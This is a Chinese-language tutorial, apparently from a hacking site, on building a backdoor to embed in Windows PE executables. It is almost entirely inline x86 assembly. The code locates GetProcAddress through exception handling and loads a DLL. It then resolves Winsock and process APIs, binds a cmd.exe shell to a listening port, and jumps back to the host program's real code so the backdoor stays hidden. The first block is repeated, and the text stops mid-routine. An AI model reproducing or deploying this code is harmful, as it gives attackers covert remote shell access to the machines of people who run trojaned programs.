PE可执行文件的镶入式程序后门开发
- /*
- 利用异常结构处理搜索GetProcAddress入口地址
- */
- #include
- #include
- main()
- {
-
- _asm
- {
- call ex//取得当前地址以计算异常结构开始的地址
- mov eax,0x77000000
- mov [ebp-0ch],eax
- mov eax,esp
- sub eax,8
- xchg fs:[0],eax
- mov DWORD ptr[ebp-00h],eax
- mov eax,fs:[4]
- mov DWORD ptr[ebp-04h],eax
- mov fs:[4h],ebp//保存ebp到fs:[4h]中
- add ecx,34h
- push ecx
- push eax
- mov edx,0
- mov byte ptr [edx],0//产生错误
- }
-
-
- //异常结构开始
- _asm
- {
- mov ebp,fs:[4]
- mov dword ptr [ebp-8h],0
- //for(;imgbase<0xff000000,procgetadd==0;){
- e104f:
- cmp dword ptr [ebp-8h],0
- jne exi
- //imgbase+=0x10000;
- mov eax,[ebp-0ch]
- add eax,10000h
- mov [ebp-0ch],eax
- //if(imgbase==0x78000000) imgbase=0xbff00000;
- cmp dword ptr [ebp-0ch],78000000h
- jne is44
- mov dword ptr [ebp-0ch],0BFF00000h
-
- /*if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int
- *)(imgbase+0x3c))=='EP'){*/
-
- is44:
-
- mov ecx,dword ptr [ebp-0ch]
- xor edx,edx
- mov dx,word ptr [ecx]
- mov dword ptr [ebp-24h],ecx
- cmp edx,5A4Dh//ZM
- jne e11db
- mov eax,[ebp-0ch]
- mov ecx,dword ptr [eax+3Ch]
- mov edx,dword ptr [ebp-0ch]
- xor eax,eax
- mov ax,word ptr [edx+ecx]
- cmp eax,4550h
- jne e11db
-
- //fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
- mov ecx,dword ptr [ebp-0ch]
- mov edx,dword ptr [ecx+3Ch]
- mov eax,[ebp-0ch]
- mov ecx,dword ptr [eax+edx+78h]
- add ecx,dword ptr [ebp-0ch]
- mov dword ptr [ebp-10h],ecx
- // k=*(int *)(fnbase+0xc)+imgbase;
- mov edx,dword ptr [ebp-10h]
- mov eax,dword ptr [edx+0Ch]
- add eax,dword ptr [ebp-0ch]
- mov dword ptr [ebp-14h],eax
-
- //if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
- mov ecx,dword ptr [ebp-14h]
- cmp dword ptr [ecx],4E52454Bh
- jne e11db
- mov edx,dword ptr [ebp-14h]
- cmp dword ptr [edx+4],32334C45h
- jne e11db
- //k=imgbase+*(int *)(fnbase+0x20);
- mov eax,dword ptr [ebp-10h]
- mov ecx,dword ptr [ebp-0ch]
- add ecx,dword ptr [eax+20h]
- mov dword ptr [ebp-14h],ecx
- //for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
- mov dword ptr [ebp-18h],0
- jmp e1127
- e1115:
- mov edx,dword ptr [ebp-18h]
- add edx,1
- mov dword ptr [ebp-18h],edx
- mov eax,dword ptr [ebp-14h]
- add eax,4
- mov dword ptr [ebp-14h],eax
- e1127:
- mov ecx,dword ptr [ebp-10h]
- mov edx,dword ptr [ebp-18h]
- cmp edx,dword ptr [ecx+18h]
- jge e11db
- /*if(*(int *)(imgbase+*(int *)k)=='tixE'&&*(int *)(4+imgbase+*(int
- *)k)=='corP'){GetProcAddress*/
- mov eax,dword ptr [ebp-14h]
- mov ecx,dword ptr [eax]
- mov edx,dword ptr [ebp-0ch]
- cmp dword ptr [edx+ecx],'PteG'
- jne e11d6
- mov eax,dword ptr [ebp-14h]
- mov ecx,dword ptr [eax]
- mov edx,dword ptr [ebp-0ch]
- cmp dword ptr [edx+ecx+4],'Acor'
- jne e11d6
- //k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
- mov eax,dword ptr [ebp-18h]
- add eax,dword ptr [ebp-18h]
- add eax,dword ptr [ebp-0ch]
- mov ecx,dword ptr [ebp-10h]
- mov edx,dword ptr [ecx+24h]
- xor ecx,ecx
- mov cx,word ptr [eax+edx]
- mov dword ptr [ebp-14h],ecx
- //k+=*(int *)(fnbase+0x10)-1;
- mov edx,dword ptr [ebp-10h]
- mov eax,dword ptr [edx+10h]
- mov ecx,dword ptr [ebp-14h]
- lea edx,dword ptr [ecx+eax-1]
- mov dword ptr [ebp-14h],edx
- //k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
- mov eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-0ch]
- mov ecx,dword ptr [ebp-10h]
- mov edx,dword ptr [ecx+1Ch]
- mov eax,dword ptr [eax+edx]
- mov dword ptr [ebp-14h],eax
- mov edx,dword ptr [ebp-14h]
- //add edx,imgbase
- add edx,dword ptr [ebp-0ch]
- // mov procgetadd,edx
- mov dword ptr [ebp-8h],edx
-
- //恢复异常结构
-
- mov eax,DWORD ptr[ebp-00h]
- mov fs:[0],eax
- mov eax,DWORD ptr[ebp-04h]
- mov fs:[4],eax
-
- jmp e11db
- e11d6:
- jmp e1115
- e11db:
- jmp e104f
-
-
- }
- //////////////////////////////////////////////////////////////
- exi:
- //取得LoadLibraryA入口地址
-
- _asm
- {
- mov dword ptr [ebp-124h],'daoL'
- mov dword ptr [ebp-120h],'rbiL'
- mov dword ptr [ebp-11Ch],'Ayra'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- mov ebx,dword ptr [ebp-24h]//kernel32.dll 入口地址
- push ebx
- mov eax,dword ptr [ebp-8h]
- mov dword ptr [ebp-4008h],eax//GetProcAddress 入口地址
- call eax
- mov dword ptr [ebp-400ch],eax//LoadLibraryA 入口地址
- }
-
- //加载 mydll.dll
-
- _asm
- {
- mov dword ptr [ebp-124h],'ldym'
- mov dword ptr [ebp-120h],'ld.l'
- mov dword ptr [ebp-11Ch],'l'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- call dword ptr [ebp-400ch]
- cmp eax,0
- jz exit1
- mov ebx,eax
-
- //取得mybegin入口地址
-
- mov dword ptr [ebp-124h],'gebM'
- mov dword ptr [ebp-120h],'ni'
- mov dword ptr [ebp-11Ch],0000h
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-4008h]
- mov dword ptr [ebp-4030h],eax//mybegin入口地址
- cmp eax,0
- jz exit1
- call eax //执行mybegin
- jmp exit1
- }
-
- ex:
- _asm
- {
- pop ecx
- push ecx
- ret
- }
- exit1:
-
- _asm
- {
- mov eax,0x401000 //这个跳转地址在代码中需要更改
- jmp eax
- }
- return 0;
- }
/*
利用异常结构处理搜索GetProcAddress入口地址
*/
#include
#include
main()
{
_asm
{
call ex//取得当前地址以计算异常结构开始的地址
mov eax,0x77000000
mov [ebp-0ch],eax
mov eax,esp
sub eax,8
xchg fs:[0],eax
mov DWORD ptr[ebp-00h],eax
mov eax,fs:[4]
mov DWORD ptr[ebp-04h],eax
mov fs:[4h],ebp//保存ebp到fs:[4h]中
add ecx,34h
push ecx
push eax
mov edx,0
mov byte ptr [edx],0//产生错误
}
//异常结构开始
_asm
{
mov ebp,fs:[4]
mov dword ptr [ebp-8h],0
//for(;imgbase<0xff000000,procgetadd==0;){
e104f:
cmp dword ptr [ebp-8h],0
jne exi
//imgbase+=0x10000;
mov eax,[ebp-0ch]
add eax,10000h
mov [ebp-0ch],eax
//if(imgbase==0x78000000) imgbase=0xbff00000;
cmp dword ptr [ebp-0ch],78000000h
jne is44
mov dword ptr [ebp-0ch],0BFF00000h
/*if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int
*)(imgbase+0x3c))=='EP'){*/
is44:
mov ecx,dword ptr [ebp-0ch]
xor edx,edx
mov dx,word ptr [ecx]
mov dword ptr [ebp-24h],ecx
cmp edx,5A4Dh//ZM
jne e11db
mov eax,[ebp-0ch]
mov ecx,dword ptr [eax+3Ch]
mov edx,dword ptr [ebp-0ch]
xor eax,eax
mov ax,word ptr [edx+ecx]
cmp eax,4550h
jne e11db
//fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
mov ecx,dword ptr [ebp-0ch]
mov edx,dword ptr [ecx+3Ch]
mov eax,[ebp-0ch]
mov ecx,dword ptr [eax+edx+78h]
add ecx,dword ptr [ebp-0ch]
mov dword ptr [ebp-10h],ecx
// k=*(int *)(fnbase+0xc)+imgbase;
mov edx,dword ptr [ebp-10h]
mov eax,dword ptr [edx+0Ch]
add eax,dword ptr [ebp-0ch]
mov dword ptr [ebp-14h],eax
//if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
mov ecx,dword ptr [ebp-14h]
cmp dword ptr [ecx],4E52454Bh
jne e11db
mov edx,dword ptr [ebp-14h]
cmp dword ptr [edx+4],32334C45h
jne e11db
//k=imgbase+*(int *)(fnbase+0x20);
mov eax,dword ptr [ebp-10h]
mov ecx,dword ptr [ebp-0ch]
add ecx,dword ptr [eax+20h]
mov dword ptr [ebp-14h],ecx
//for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
mov dword ptr [ebp-18h],0
jmp e1127
e1115:
mov edx,dword ptr [ebp-18h]
add edx,1
mov dword ptr [ebp-18h],edx
mov eax,dword ptr [ebp-14h]
add eax,4
mov dword ptr [ebp-14h],eax
e1127:
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ebp-18h]
cmp edx,dword ptr [ecx+18h]
jge e11db
/*if(*(int *)(imgbase+*(int *)k)=='tixE'&&*(int *)(4+imgbase+*(int
*)k)=='corP'){GetProcAddress*/
mov eax,dword ptr [ebp-14h]
mov ecx,dword ptr [eax]
mov edx,dword ptr [ebp-0ch]
cmp dword ptr [edx+ecx],'PteG'
jne e11d6
mov eax,dword ptr [ebp-14h]
mov ecx,dword ptr [eax]
mov edx,dword ptr [ebp-0ch]
cmp dword ptr [edx+ecx+4],'Acor'
jne e11d6
//k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
mov eax,dword ptr [ebp-18h]
add eax,dword ptr [ebp-18h]
add eax,dword ptr [ebp-0ch]
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ecx+24h]
xor ecx,ecx
mov cx,word ptr [eax+edx]
mov dword ptr [ebp-14h],ecx
//k+=*(int *)(fnbase+0x10)-1;
mov edx,dword ptr [ebp-10h]
mov eax,dword ptr [edx+10h]
mov ecx,dword ptr [ebp-14h]
lea edx,dword ptr [ecx+eax-1]
mov dword ptr [ebp-14h],edx
//k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
mov eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-0ch]
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ecx+1Ch]
mov eax,dword ptr [eax+edx]
mov dword ptr [ebp-14h],eax
mov edx,dword ptr [ebp-14h]
//add edx,imgbase
add edx,dword ptr [ebp-0ch]
// mov procgetadd,edx
mov dword ptr [ebp-8h],edx
//恢复异常结构
mov eax,DWORD ptr[ebp-00h]
mov fs:[0],eax
mov eax,DWORD ptr[ebp-04h]
mov fs:[4],eax
jmp e11db
e11d6:
jmp e1115
e11db:
jmp e104f
}
//////////////////////////////////////////////////////////////
exi:
//取得LoadLibraryA入口地址
_asm
{
mov dword ptr [ebp-124h],'daoL'
mov dword ptr [ebp-120h],'rbiL'
mov dword ptr [ebp-11Ch],'Ayra'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
mov ebx,dword ptr [ebp-24h]//kernel32.dll 入口地址
push ebx
mov eax,dword ptr [ebp-8h]
mov dword ptr [ebp-4008h],eax//GetProcAddress 入口地址
call eax
mov dword ptr [ebp-400ch],eax//LoadLibraryA 入口地址
}
//加载 mydll.dll
_asm
{
mov dword ptr [ebp-124h],'ldym'
mov dword ptr [ebp-120h],'ld.l'
mov dword ptr [ebp-11Ch],'l'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
call dword ptr [ebp-400ch]
cmp eax,0
jz exit1
mov ebx,eax
//取得mybegin入口地址
mov dword ptr [ebp-124h],'gebM'
mov dword ptr [ebp-120h],'ni'
mov dword ptr [ebp-11Ch],0000h
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-4008h]
mov dword ptr [ebp-4030h],eax//mybegin入口地址
cmp eax,0
jz exit1
call eax //执行mybegin
jmp exit1
}
ex:
_asm
{
pop ecx
push ecx
ret
}
exit1:
_asm
{
mov eax,0x401000 //这个跳转地址在代码中需要更改
jmp eax
}
return 0;
}
- /*
- 利用异常结构处理搜索GetProcAddress入口地址
- 然后用这个函数加载其他api函数.实现线程一个返回另一个
- 绑定cmd.exe或command.com功能
- */
- #include
- #include
- main()
- {
- _asm
- {
- call ex
- mov eax,0x77000000
- mov [ebp-0ch],eax
- mov eax,esp
- sub eax,8
- xchg fs:[0],eax
- mov DWORD ptr[ebp-00h],eax
- mov eax,fs:[4]
- mov DWORD ptr[ebp-04h],eax
- mov fs:[4h],ebp
- add ecx,34h
- push ecx
- push eax
- mov edx,0
- mov byte ptr [edx],0
- mov ebp,fs:[4]
- mov dword ptr [ebp-8h],0
- e104f:
- cmp dword ptr [ebp-8h],0
- jne exi
- mov eax,[ebp-0ch]
- add eax,10000h
- mov [ebp-0ch],eax
- cmp dword ptr [ebp-0ch],78000000h
- jne is44
- mov dword ptr [ebp-0ch],0BFF00000h
- is44:
- mov ecx,dword ptr [ebp-0ch]
- xor edx,edx
- mov dx,word ptr [ecx]
- mov dword ptr [ebp-24h],ecx
- cmp edx,5A4Dh//ZM
- jne e11db
- mov eax,[ebp-0ch]
- mov ecx,dword ptr [eax+3Ch]
- mov edx,dword ptr [ebp-0ch]
- xor eax,eax
- mov ax,word ptr [edx+ecx]
- cmp eax,4550h
- jne e11db
- mov ecx,dword ptr [ebp-0ch]
- mov edx,dword ptr [ecx+3Ch]
- mov eax,[ebp-0ch]
- mov ecx,dword ptr [eax+edx+78h]
- add ecx,dword ptr [ebp-0ch]
- mov dword ptr [ebp-10h],ecx
- mov edx,dword ptr [ebp-10h]
- mov eax,dword ptr [edx+0Ch]
- add eax,dword ptr [ebp-0ch]
- mov dword ptr [ebp-14h],eax
- mov ecx,dword ptr [ebp-14h]
- cmp dword ptr [ecx],4E52454Bh
- jne e11db
- mov edx,dword ptr [ebp-14h]
- cmp dword ptr [edx+4],32334C45h
- jne e11db
- mov eax,dword ptr [ebp-10h]
- mov ecx,dword ptr [ebp-0ch]
- add ecx,dword ptr [eax+20h]
- mov dword ptr [ebp-14h],ecx
- mov dword ptr [ebp-18h],0
- jmp e1127
- e1115:
- mov edx,dword ptr [ebp-18h]
- add edx,1
- mov dword ptr [ebp-18h],edx
- mov eax,dword ptr [ebp-14h]
- add eax,4
- mov dword ptr [ebp-14h],eax
- e1127:
- mov ecx,dword ptr [ebp-10h]
- mov edx,dword ptr [ebp-18h]
- cmp edx,dword ptr [ecx+18h]
- jge e11db
- mov eax,dword ptr [ebp-14h]
- mov ecx,dword ptr [eax]
- mov edx,dword ptr [ebp-0ch]
- cmp dword ptr [edx+ecx],'PteG'
- jne e11d6
- mov eax,dword ptr [ebp-14h]
- mov ecx,dword ptr [eax]
- mov edx,dword ptr [ebp-0ch]
- cmp dword ptr [edx+ecx+4],'Acor'
- jne e11d6
- mov eax,dword ptr [ebp-18h]
- add eax,dword ptr [ebp-18h]
- add eax,dword ptr [ebp-0ch]
- mov ecx,dword ptr [ebp-10h]
- mov edx,dword ptr [ecx+24h]
- xor ecx,ecx
- mov cx,word ptr [eax+edx]
- mov dword ptr [ebp-14h],ecx
- mov edx,dword ptr [ebp-10h]
- mov eax,dword ptr [edx+10h]
- mov ecx,dword ptr [ebp-14h]
- lea edx,dword ptr [ecx+eax-1]
- mov dword ptr [ebp-14h],edx
- mov eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-0ch]
- mov ecx,dword ptr [ebp-10h]
- mov edx,dword ptr [ecx+1Ch]
- mov eax,dword ptr [eax+edx]
- mov dword ptr [ebp-14h],eax
- mov edx,dword ptr [ebp-14h]
- add edx,dword ptr [ebp-0ch]
- mov dword ptr [ebp-8h],edx
- //恢复异常结构
- mov eax,DWORD ptr[ebp-00h]
- mov fs:[0],eax
- mov eax,DWORD ptr[ebp-04h]
- mov fs:[4],eax
- jmp e11db
- e11d6:
- jmp e1115
- e11db:
- jmp e104f
-
- }
-
- //////////////////////////////////////////////////////////////
-
- exi:
-
- //取得各个需要函数的地址
-
- //取得LoadLibraryA入口地址
- _asm
-
- {
- call ex1
- mov dword ptr [ecx-0C70h],ebp
- mov dword ptr [ebp-124h],'daoL'
- mov dword ptr [ebp-120h],'rbiL'
- mov dword ptr [ebp-11Ch],'Ayra'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- mov ebx,dword ptr [ebp-24h]//kernel32.dll 入口地址
- push ebx
- mov eax,dword ptr [ebp-8h]
- mov dword ptr [ebp-4008h],eax//GetProcAddress 入口地址
- call eax
- mov dword ptr [ebp-400ch],eax//LoadLibraryA 入口地址
-
- //CreatePipe入口地址
- mov dword ptr [ebp-124h],'aerC'
- mov dword ptr [ebp-120h],'iPet'
- mov dword ptr [ebp-11Ch],'ep'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4000h],eax//CreatePipe入口地址
- cmp eax,0
- jz exit1
-
- //GetVersion入口地址
-
- mov dword ptr [ebp-124h],'VteG'
- mov dword ptr [ebp-120h],'isre'
- mov dword ptr [ebp-11Ch],'no'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4004h],eax//GetVersion 入口地址
- cmp eax,0
- jz exit1
-
- //CloseHandle入口地址
-
- mov dword ptr [ebp-124h],'solC'
- mov dword ptr [ebp-120h],'naHe'
- mov dword ptr [ebp-11Ch],'eld'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4010h],eax//CloseHandle 入口地址
- cmp eax,0
- jz exit1
-
- //ExitThread入口地址
-
- mov dword ptr [ebp-124h],'tixE'
- mov dword ptr [ebp-120h],'erhT'
- mov dword ptr [ebp-11Ch],'da'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4014h],eax//ExitThread入口地址
- cmp eax,0
- jz exit1
-
- //Sleep入口地址
-
- mov dword ptr [ebp-124h],'eelS'
- mov dword ptr [ebp-120h],'p'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4018h],eax//Sleep入口地址
- cmp eax,0
- jz exit1
-
- //WriteFile入口地址
-
- mov dword ptr [ebp-124h],'tirW'
- mov dword ptr [ebp-120h],'liFe'
- mov dword ptr [ebp-11Ch],'e'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-401Ch],eax//WriteFile入口地址
- cmp eax,0
- jz exit1
-
- //PeekNamedPipe入口地址
-
- mov dword ptr [ebp-124h],'keeP'
- mov dword ptr [ebp-120h],'emaN'
- mov dword ptr [ebp-11Ch],'piPd'
- mov dword ptr [ebp-118h],'e'
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4020h],eax//PeekNamedPipe入口地址
- cmp eax,0
- jz exit1
-
- //ReadFile入口地址
-
- mov dword ptr [ebp-124h],'daeR'
- mov dword ptr [ebp-120h],'eliF'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4024h],eax//ReadFile入口地址
- cmp eax,0
- jz exit1
-
- //GetStartupInfoA入口地址
-
- mov dword ptr [ebp-124h],'SteG'
- mov dword ptr [ebp-120h],'trat'
- mov dword ptr [ebp-11Ch],'nIpu'
- mov dword ptr [ebp-118h],'Aof'
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4028h],eax//GetStartupInfoA入口地址
- cmp eax,0
- jz exit1
-
- //CreateProcessA入口地址
-
- mov dword ptr [ebp-124h],'aerC'
- mov dword ptr [ebp-120h],'rPet'
- mov dword ptr [ebp-11Ch],'seco'
- mov dword ptr [ebp-118h],'As'
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-402Ch],eax//CreateProcessA入口地址
- cmp eax,0
- jz exit1
-
- //CreateThread入口地址
-
- mov dword ptr [ebp-124h],'aerC'
- mov dword ptr [ebp-120h],'hTet'
- mov dword ptr [ebp-11Ch],'daer'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4008h],eax//CreateThread入口地址
- cmp eax,0
- jz exit1
- }
-
- //load wsock32.dll
- _asm
- {
- mov dword ptr [ebp-124h],'cosw'
- mov dword ptr [ebp-120h],'.23k'
- mov dword ptr [ebp-11Ch],'lld'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- call dword ptr [ebp-400ch]
- cmp eax,0
- jz exit1
- mov ebx,eax
-
- //WSAStartup入口地址
-
- mov dword ptr [ebp-124h],'SASW'
- mov dword ptr [ebp-120h],'trat'
- mov dword ptr [ebp-11Ch],'pu'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4030h],eax//WSAStartup入口地址
- cmp eax,0
- jz exit1
- //__WSAFDIsSet入口地址
- mov dword ptr [ebp-124h],'SW__'
- mov dword ptr [ebp-120h],'IDFA'
- mov dword ptr [ebp-11Ch],'teSs'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4034h],eax//__WSAFDIsSet入口地址
- cmp eax,0
- jz exit1
- //socket入口地址
- mov dword ptr [ebp-124h],'kcos'
- mov dword ptr [ebp-120h],'te'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4038h],eax//socket入口地址
- cmp eax,0
- jz exit1
- //closesocket入口地址
- mov dword ptr [ebp-124h],'solc'
- mov dword ptr [ebp-120h],'cose'
- mov dword ptr [ebp-11Ch],'tek'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-403Ch],eax//closesocket入口地址
- cmp eax,0
- jz exit1
- //select入口地址
- mov dword ptr [ebp-124h],'eles'
- mov dword ptr [ebp-120h],'tc'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4040h],eax//select入口地址
- cmp eax,0
- jz exit1
- //recv入口地址
- mov dword ptr [ebp-124h],'vcer'
- mov dword ptr [ebp-120h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4044h],eax//recv入口地址
- cmp eax,0
- jz exit1
- //send入口地址
- mov dword ptr [ebp-124h],'dnes'
- mov dword ptr [ebp-120h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4048h],eax//send入口地址
- cmp eax,0
- jz exit1
- //htons入口地址
- mov dword ptr [ebp-124h],'noth'
- mov dword ptr [ebp-120h],'s'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-404Ch],eax//htons入口地址
- cmp eax,0
- jz exit1
- //bind入口地址
- mov dword ptr [ebp-124h],'dnib'
- mov dword ptr [ebp-120h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4050h],eax//bind入口地址
- cmp eax,0
- jz exit1
- //listen入口地址
- mov dword ptr [ebp-124h],'tsil'
- mov dword ptr [ebp-120h],'ne'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4054h],eax//listen入口地址
- cmp eax,0
- jz exit1
- //accept入口地址
- mov dword ptr [ebp-124h],'ecca'
- mov dword ptr [ebp-120h],'tp'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4058h],eax//accept入口地址
- cmp eax,0
- jz exit1
- }
- //load msvcrt.dll
- _asm
- {
- mov dword ptr [ebp-124h],'cvsm'
- mov dword ptr [ebp-120h],'d.tr'
- mov dword ptr [ebp-11Ch],'ll'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- call dword ptr [ebp-400ch]
- cmp eax,0
- jz exit1
- mov ebx,eax
- //memset入口地址
- mov dword ptr [ebp-124h],'smem'
- mov dword ptr [ebp-120h],'te'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4090h],eax//memset入口地址
- cmp eax,0
- jz exit1
- }
-
- //////////////////////////////////////////////////////////////
-
- //建立后门线程
-
- /////////////////////////////////////////////////////////////
- _asm
- {
- call ex
- add ecx,32h //取得后门代码的地址
- mov dword ptr [ebp-8],1
- mov dword ptr [ebp-0Ch],0
- mov dword ptr [ebp-10h],0Ch
- lea eax,[ebp-4]
- push eax
- push 0
- push 0
- push ecx
- push 0
- lea ecx,[ebp-10h]
- push ecx
- call dword ptr [ebp-4008h]
- call exit1 //返回真正的代码
- }
- //////////////////////////////////////////////////////////////
- //建立后门
- /////////////////////////////////////////////////////////////
- _asm
- {
- mov eax,0x400
- call ex1
- mov ebp,dword ptr [ecx-0C70h]
- mov byte ptr [ebp-1340h],0Dh
- mov dword ptr [ebp-11ECh],0FFFFFFFFh
- mov dword ptr [ebp-1DCh],0
- mov dword ptr [ebp-1D8h],32h
- mov dword ptr [ebp-1E4h],10h
- call dword ptr [ebp-4004h]
- cmp eax,80000000h
- jnb loc_0040106C
- mov dword ptr [ebp-11ECh],1
- mov dword ptr [ebp-4118h],'.dmc'
- mov dword ptr [ebp-4114h],'exe'
- mov dword ptr [ebp-4110h],00000000h
- jmp loc_0040107D
- loc_0040106C:
- mov dword ptr [ebp-11ECh],0
- mov dword ptr [ebp-4118h],'mmoc'
- mov dword ptr [ebp-4114h],'.dna'
- mov dword ptr [ebp-4110h],'moc'
- loc_0040107D:
- lea eax,[ebp-1D4h]
- push eax
- push 101h
- call dword ptr [ebp-4030h]
- push 0
- push 1
- push 2
- call dword ptr [ebp-4038h]
- mov [ebp-30h],eax
- push 0
- push 1
- push 2
- call dword ptr [ebp-4038h]
- mov [ebp-12F8h],eax
- mov word ptr [ebp-28h],2
- push 7D0h
- call dword ptr [ebp-404Ch]
- mov [ebp-26h],ax
- mov dword ptr [ebp-24h],0
- mov dword ptr [ebp-44h],0Ch
- mov dword ptr [ebp-40h],0
- mov dword ptr [ebp-3Ch],1
- push 10h
- lea ecx,[ebp-28h]
- push ecx
- mov edx,[ebp-30h]
- push edx
- call dword ptr [ebp-4050h]
- push 2
- mov eax,[ebp-30h]
- push eax
- call dword ptr [ebp-4054h]
- loc_004010F7:
- lea ecx,[ebp-1E4h]
- push ecx
- lea edx,[ebp-28h]
- push edx
- mov eax,[ebp-30h]
- push eax
- call dword ptr [ebp-4058h]
- mov [ebp-12F8h],eax
- cmp dword ptr [ebp-12F8h],0FFFFFFFFh
- jnz loc_00401121
- xor eax,eax
- jmp loc_00401419
- loc_00401121:
- push 0
- lea ecx,[ebp-44h]
- push ecx
- lea edx,[ebp-34h]
- push edx
- lea eax,[ebp-38h]
- push eax
- call dword ptr [ebp-4000h]
- test eax,eax
- jnz loc_00401140
- xor eax,eax
- jmp loc_00401419
- loc_00401140:
- push 0
- lea ecx,[ebp-44h]
- push ecx
- lea edx,[ebp-1E0h]
- push edx
- lea eax,[ebp-2Ch]
- push eax
- call dword ptr [ebp-4000h]
- push 44h
- push 0
- lea ecx,[ebp-133Ch]
- push ecx
- call dword ptr [ebp-4090h]
- add esp,0Ch
- lea edx,[ebp-133Ch]
- push edx
- call dword ptr [ebp-4028h]
- mov dword ptr [ebp-133Ch],44h
- mov dword ptr [ebp-1310h],101h
- mov word ptr [ebp-130Ch],0
- mov eax,[ebp-34h]
- mov [ebp-12FCh],eax
- mov ecx,[ebp-2Ch]
- mov [ebp-1304h],ecx
- mov edx,[ebp-34h]
- mov [ebp-1300h],edx
- lea eax,[ebp-14h]
- push eax
- lea ecx,[ebp-133Ch]
- push ecx
- push 0
- push 0
- push 0
- push 1
- push 0
- push 0
- lea edx,[ebp-4118h]
- push edx
- push 0
- call dword ptr [ebp-402Ch]
- test eax,eax
- jnz loc_004011DD
- xor eax,eax
- jmp loc_00401419
- loc_004011DD:
- push 0C8h
